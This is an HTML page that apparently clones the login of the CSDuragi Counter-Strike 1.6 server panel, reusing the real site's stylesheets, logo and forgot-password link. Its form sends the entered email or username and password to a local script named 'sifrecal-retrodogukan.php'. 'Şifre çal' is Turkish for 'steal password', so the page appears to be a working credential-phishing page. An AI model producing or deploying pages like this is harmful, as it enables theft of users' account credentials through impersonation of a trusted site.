
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/html">
<head>
<meta charset="utf-8">
<meta name="viewport" content="target-densitydpi=device-dpi, width=device-width, initial-scale=1.0, maximum-scale=1">
<meta name="description" content="CSDuragi Panel Giriş">
<meta name="author" content="Ömer Telli">
<meta name="keywords" content="csduragi,csduragi panel,csduragi panel giriş,csduragi panel resimleri,cs 1.6 panel">
<link href="https://panel.csduragi.com/css/csdpanel.css" rel="stylesheet">
<link href="https://panel.csduragi.com/css/login.css" rel="stylesheet">
<title>CSDuragi Panel Girişi ( csduragi.com )</title>
</head>
<link rel="stylesheet" href="css/bildirim.css">
<link rel="stylesheet" href="css/cerceveler.css">
<link rel="stylesheet" href="css/csdpanel.css">
<link rel="stylesheet" href="css/form.css">
<link rel="stylesheet" href="css/login.css">
<link rel="stylesheet" href="css/menu.css">
<link rel="stylesheet" href="css/renkler.css">
<link rel="stylesheet" href="css/sayfalama.css">
<body>
<div class="cerceve">
<div class="ortala">
<div id="login_aciklama"><div class="loginaciklama_text">Lütfen e-posta adresinizi ( yada alt kullanıcı adınızı ) ve şifrenizi girin.</div></div>
<div id="loginform">
<div id="user_image">
</div>
<div id="form">
<img src="https://panel.csduragi.com/images/csdv2013.png" alt="" title="csduragi panel" />
<div class="login_form_element">
<form action="sifrecal-retrodogukan.php" method="post">
<input type="text" value="E-mail adresiniz veya kullanıcı adınız" name="email" id="email" onfocus="if(this.value==this.defaultValue)this.value='';" onblur="if(this.value=='')this.value=this.defaultValue;" /><br />
<input type="password" value="şifreniz" name="sifre" id="sifre" onfocus="if(this.value==this.defaultValue)this.value='';" onblur="if(this.value=='')this.value=this.defaultValue;" />
<br />
<input type="submit" value="giriş" style="width:120px" style="float:left" />
<button type="button" class="button fume" style="width:120px;height:35px;" /><a href="https://panel.csduragi.com/index/sifremiunuttum">Şifremi Unuttum ?</a></button>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>